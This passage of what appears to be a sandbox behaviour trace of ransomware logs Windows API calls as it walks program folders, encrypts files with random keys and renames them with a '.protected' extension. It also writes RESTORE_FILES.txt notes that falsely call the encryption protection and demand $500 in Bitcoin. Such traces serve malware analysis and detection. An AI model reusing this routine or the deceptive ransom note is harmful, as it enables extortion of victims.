to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.500] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0074.501] lstrlenA (lpString="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") returned 684 [0074.501] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0074.501] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.501] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0074.501] CloseHandle (hObject=0xb4) returned 1 [0074.501] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.501] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.502] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt") returned 101 [0074.502] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.502] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.502] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.503] lstrlenA (lpString="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") returned 684 [0074.503] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.503] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.503] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0074.503] CloseHandle (hObject=0xa4) returned 1 [0074.503] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="Windows") returned -1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="Program Files") returned -1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="System Volume Information") returned -1 [0074.503] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 82 [0074.503] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2=".") returned 1 [0074.503] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="..") returned 1 [0074.503] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*") returned 84 [0074.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.503] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.503] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.504] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.504] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.504] lstrcmpiW (lpString1=".", 
lpString2="System Volume Information") returned -1 [0074.504] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\.") returned 84 [0074.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.504] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.504] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.504] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.504] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.504] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.504] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.504] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\..") returned 85 [0074.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.504] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.504] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned 91 [0074.504] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.504] lstrcmpW 
(lpString1="packages", lpString2="..") returned 1 [0074.505] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*") returned 93 [0074.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.506] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.506] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.506] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.506] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.506] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.506] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\.") returned 93 [0074.506] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.506] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.506] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.506] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.506] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.506] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.506] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.506] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\..") returned 94 [0074.506] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.506] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0074.507] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Windows") returned -1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files") returned 1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files (x86)") returned 1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$Recycle.bin") returned 1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="System Volume Information") returned 1 [0074.507] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned 117 [0074.507] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0074.507] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0074.507] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*") returned 119 [0074.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.507] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.507] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.507] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.507] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.507] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.507] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\.") returned 119 [0074.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.507] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.507] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.508] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.508] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.508] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.508] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.508] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\..") returned 120 [0074.508] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.508] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.508] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.508] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0074.508] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.508] lstrcmpW (lpString1="cab1.cab", 
lpString2="RESTORE_FILES.txt") returned -1 [0074.508] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.508] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0074.509] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0074.509] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0074.509] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.509] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.527] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.527] 
WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.528] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.528] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.535] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.535] CloseHandle (hObject=0xd8) returned 1 [0074.536] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 136 [0074.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.protected")) returned 1 [0074.536] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Windows") 
returned -1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files") returned 1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files (x86)") returned 1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$Recycle.bin") returned 1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="System Volume Information") returned 1 [0074.536] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0074.536] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".protected") returned 0x0 [0074.536] lstrcmpW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.536] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.536] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.536] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.537] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0074.537] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", 
lpSrch=".txt") returned 0x0 [0074.537] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0074.537] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".rar") returned 0x0 [0074.537] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0074.537] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".zip") returned 0x0 [0074.537] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.551] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.551] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.552] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.552] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.552] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.552] CloseHandle (hObject=0xd8) returned 1 [0074.553] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 156 [0074.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.protected")) returned 1 [0074.553] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.553] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.554] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 135 [0074.554] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0074.587] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.587] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0074.588] lstrlenA (lpString="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") returned 684 [0074.588] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, 